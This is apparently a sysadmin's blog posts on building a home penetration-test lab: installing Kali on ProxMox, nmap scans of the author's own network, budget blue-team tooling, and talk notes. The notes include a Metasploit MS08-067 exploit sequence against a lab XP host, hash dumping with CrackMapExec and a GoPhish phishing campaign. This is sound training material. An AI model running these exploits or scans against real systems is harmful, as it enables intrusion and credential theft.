Installing Kali Linux on ProxMox – Building a Penetration Test Lab – Part 2

In the process of building a Penetration Test Lab, I wanted to get started with the installation of Kali Linux virtual machine running on ProxMox. To get started, first download the latest version of Kali Linux (ISO) here. Grab the version

Kali 64 bit ISO | Torrent 2.6G 2017.1

Build your new VM (Proxmox > Create VM) using the ISO you’ve downloaded.

According to other user’s accounts of Kali not working after installation, it’s recommended to change the display type to VMWare compatible: After building the VM, change Hardware > Display > Edit > Choose VMWare compatible:

Kali installs onto a virtual hard drive on ProxMox (we will not be running a “live” version of Kali.) Start the new VM and scroll down the menu and choose Install  – (not GUI install.)

During installation, when grub asks where to have grub installed, choose “select your own location.”
Manually enter the path: /dev/sda
Otherwise, if you choose the ‘default’ or the path already listed, after completing the installation and a restart, you’ll get a message “Booting from Hard Disk” and the boot sequence will not complete, the VM will essentially hang.

Kali has completed its setup, I’ve booted the Kali VM, I’ve logged in, and I’m on the desktop.

Run apt-get update and apt-get upgrade to update the packages on your system.

Before we go on to complete the setup of the rest of our lab with known-vulnerable hosts, let’s run some cursory nmap scans.

Let’s run a ping scan on our own network with the command:

nmap -v -sn 10.0.10.0/24

This says: nmap, print verbose output (-v), do a Ping Scan (-sn) – (disable the default port scan for each address), and use the network 10.0.10.0 with a CIDR of /24.

This scan will attempt to ping all 254 addresses. The highlights of the scan are below:

root@HN-kali01:~# nmap -v -sn 10.0.10.0/24

Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-04 15:13 PDT
Initiating ARP Ping Scan at 15:13
Scanning 255 hosts [1 port/host]
Completed ARP Ping Scan at 15:13, 1.95s elapsed (255 total hosts)
Initiating Parallel DNS resolution of 255 hosts. at 15:13
Completed Parallel DNS resolution of 255 hosts. at 15:13, 5.53s elapsed
Nmap scan report for 10.0.10.0 [host down]
Nmap scan report for pfSense2x.jasoncoltrin.local (10.0.10.1)
Host is up (0.00048s latency).
MAC Address: 62:65:B1:30:52:A7 (Unknown)
Nmap scan report for 10.0.10.2 [host down]
Nmap scan report for 10.0.10.3 [host down]

...
...
Nmap scan report for 10.0.10.51
Host is up (0.00049s latency).
MAC Address: 18:03:73:34:34:36 (Dell)
Nmap scan report for 10.0.10.52 [host down]
Nmap scan report for 10.0.10.53 [host down]

So here we see that the scan detected my pfSense virtual machine firewall on IP 10.0.10.1, and gave me the MAC Address.

Let’s take a closer look at my the Dell workstation found on 10.0.10.51. To do so, let’s run a port scan:

nmap -p 1-65535 -sV -sS -T4 10.0.10.51

This scan does the following:

Run a full port scan on ports 1-65535, detect service versions, run a Stealth Syn scan, use T4 timing and the target of the scan is IP 10.0.10.51.

Below are the results:

root@HN-kali01:~# nmap -p 1-65535 -sV -sS -T4 10.0.10.51

Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-04 15:17 PDT
Nmap scan report for 10.0.10.51
Host is up (0.00047s latency).
Not shown: 65528 filtered ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
2179/tcp  open  vmrdp?
27036/tcp open  ssl/steam    Valve Steam In-Home Streaming service (TLSv1.2 PSK)
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 18:03:73:34:34:36 (Dell)
Service Info: Host: JCDESKTOP; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 141.84 seconds

Because I don’t always like to use my new Kali VM via the ProxMox console, I want to run my Kali desktop over VNC & SSH. Here is a good resource for learning how to connect to your Kali Linux system with VNC over a secure SSH connection:

In the next post, we’ll look some more at NMAP, as well as some other pen-test tools.

Security – Blue Team – Building a security project on a budget

How to Create and Build a Security Profile for Your Network on a Budget – Part 1

Start with Building a Foundation (or use an existing good one).

Credit to Kyle Bubp & irongeek.com: http://www.irongeek.com/i.php?page=videos/bsidescleveland2017/bsides-cleveland-102-blue-teamin-on-a-budget-of-zero-kyle-bubp

Use a Base Framework for your security project. There are a lot of standards available and the NIST government standards are a good solid foundation:

  • NIST 800-53
  • NIST Cybersecurity Framework
  • NIST CSF Tool
  • CIS Critical Security Controls
  • NIST-CSF tool – this is a nice visual tool – graphical interface for the stages of building a security program

Document everything

A core documentation repository is critical when setting up a security project – others will follow you and will need to look up the information you have recorded. It’s best to have a security incident response ticketing system and documentation before you need it. Have these tools up and ready.

For policy, procedure, how-tos, etc:

  • MediaWiki(free)
  • Atlassian Confluence ($10 for 10 users) – glyfee plugin for confluence
  • OneNote/SharePoint – not every company is entirely open source

Incident Response Ticketing/Documentation systems:

Map out your entire network

  • NetDB – Uses ARP tables and MAC databases on your network gear. (use a service account and NetDB will use ssh/telnet to find every device connected, will give a nice http interface. You can setup a cron job that will scan NetDB database every hour. You can pipe new device connections to an email address. Knowing if something comes onto your network is critical.

.ova is available at https://www.kylebubp.com/files/netdb.ova

Supports the following: Cisco, Palo Alto, JunoOS, Aruba, Dell Powerconnect

  • nmap scans + ndiff/yandiff – not just for red teams; export results, diff for changes. Alert if something changed.
  • NetDisco

https://sourceforge.net/projects/netdisco – uses SNMP to inventory your network devices.

  • Map your network – create a Visio document and have a good network map.

Visibility

Facebook-developed osquery and this tool can give you all you need.

Agents for MacOS, Windows, Linux

Deploy across your enterprise w/ Chef, Puppet, or SCCM

Do fun things like search for IoC’s (FBI file hashes, processes) – pipe the data into ElasticStack for visibility & search-ability

User Data Discovery

OpenDLP – (github) or (download an .ova) – will scan file shares and using a normal user account you can scan for available shares and data. Run over the weekend and see what you can find. Find the data owners and determine where the data should reside.

Hardening Your Network

CIS Benchmarks – Center for Internet Security Benchmarks: 100+ configuration guidelines for various technology groups to safeguard systems against today’s evolving cyber threats.

Out of the box, windows 10 is 22% for the CIS benchmark.

It’s difficult to secure your network if everything is a snowflake. While not exciting, configuration management is important. Deploy configs across your org using tools like GPO, Chef, or Puppet.

Change management is also important – use git repo for trackign changes to your config scripts.

Safety vs. Risk

Scanning for Vulnerabilities:

OpenVAS (greenbone) is a fork of Nessus which is still maintained, is the default vulnerability scanner in AlienVault. It does a great job in comparison with commercial products. Be careful, do some safe scans first and it’s not recommended to scan critical life-support equipment for example in a hospital.

Scan web apps:

Arachni Framework – for finding bugs in your developer’s code

OWASP ZAP (Zed Attack Proxy)

Nikto2 (Server config scanner)

Portswigger Burp Suite (not free – $350)

Harden your web servers:

Fail2ban – python-based IPS that runs off of Apache Logs

ModSecurity – Open source WAF for Apache & IIS

Building a penetration test lab – Part 1

Notes on how to create a Penetration Testing Lab

I’ve always had an interest in penetration testing and have messed around with nmap and nessus, but now I’m going to dig in my heels and become proficient using the tools in the pen-test theater. The following post is more of an outline of what is found in a youtube video I found here at Derbycon 2016. This speaker was inspiring as well as a few others who’ve spoken because they said that Sysadmins make good penetration testers. They mentioned that someone who is good at building systems and networks in general do well at breaking them down and actively locating and fixing problems in other systems. I am not looking to become a script kiddy, or a black hat/dark side cracker for that matter, but I do hope to become proficient with the tools they use, as well as work with python to build my own tools.

Since I last upgraded my vm server to proxmox, I’ve been kicking around ideas on how to use the hardware to it’s fullest potential. I’ve already gotten started by by first creating a new network on my proxmox host, and started up my first server in my segrated ‘insecure’ network by spinning up an isc-dhcp-server. I’ll probably post info on my build as I go along so stay tuned.

-Start of Video notes-

Credit: David Boyd
Pentest lab requirements:

  • Core i5 CPU
  • 16gb RAM
  • 250-500GB HDD
  • 7zip

VM software:

  • virtualbox
  • VMWare
  • Hyper-V
  • (I’ll be using) ProxMox

Pentesting platforms:

  • Kali Linux
  • Samurai WTF (WebAppTesting)
  • SamuraiSTFU(Utility Hacking)
  • Deft Linux (Forensics)

Old stuff:

  • olpix (?)
  • IWax(?)
  • backtrack (now Kali)

Offensive Security has – pre-compiled linux distro

Note: generate your own SSH keys

Now need something to attack…
Vulnerable VM’s:

  • Metasploitable 2 (Metasploit) – intentionally vulnerable Ubuntu has remote logins, backdoors, default pwds, vulnerable web services
  • Morning Catch (Phishing)
  • OWASP BrokenWebApplications (WebApps)
    WebGoat (Web Applications)
  • vulnhub.com (challengeVMs)
  • Kioptrix (Beginners)
  • PwnOS

Guides to pen expoits:
https://community.rapid7.com/docs/DOC-1875

Introducing Morning Catch
http://blog.cobaltstrike.com/2014/08/06/introducing-morning-catch-a-phishing-paradise/ – real working phishing lab

Sans Mutillidae Whitepaper
https://www.sans.org/reading-room/whitepapers/testing/introduction-owasp-mutillidae-ii-web-pen-test-training-environment-34380

VM’s to build and test:

Do not expose vulnerable vm’s to internet!
Make them hosts only (or in proxmox create a new bridge)

More tools:

  • nmap
  • nessus
  • cain (still works)
  • responder
  • john the ripper/hashcat
  • metasploit (freeversion works great)
  • SET/GoPhish/SPF (social engineering)
  • Discover Scripts – great stuff – great reconnisance
  • PowershellEmpire
  • CrackMapExec (post exploit)

How to Build a test domain controller, and add users with various privileges:
http://thehackerplaybook.com/windows-domain.htm

Once the virtual machines have been setup and set to ‘host only’
ping each vm

Initial testing and exploit example:

On Kali:
nmap 192.168.110.2 (XP)
nmap -O 192.168.110.2 (checks for OS)
msfconsole
msf> search ms08-067
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
(shows mudule options)
msf exploit(ms08_067_netapi) > set RHOST 192.168.110.2
msf exploit(ms08_067_netapi) > exploit

kali:`# crackmapexec
(dumps hashes)

phishing server – load up goPhish – setup add users, make campaign

Additional training:
Metasploit unleashed
https://www.offensive-security.com/metasploit-unleashed

Hack This Site!
https://www.hackthissite.org/reading-room/whitepapers/testing/introduction-owasp-mutillidae-ii-web-pen-test-training-environment-34380
Youtube videos:
Derbycon, BSides, DefCon, ISSA

More information: Sans Cyber Aces, InfoSec Institute, Cybrary

It’s wise to find a mentor, as well as do some mentoring

Recommended reading (actual paper books):

  • The hacker playbook
  • Penetration Testing – a hands-on introduction to hacking – george wymann
  • Metasploit – The Penetration Tester’s Guide
  • Hacking – The art of exploitation Erickson
  • Professional Penetration Testing
  • The Art of Intrusion – kevin mitnick
  • The art of deception – kevin mitnick
  • Ghost in the wires – kevin mitnick
  • Black Hat Python – Jason Street

-End video notes-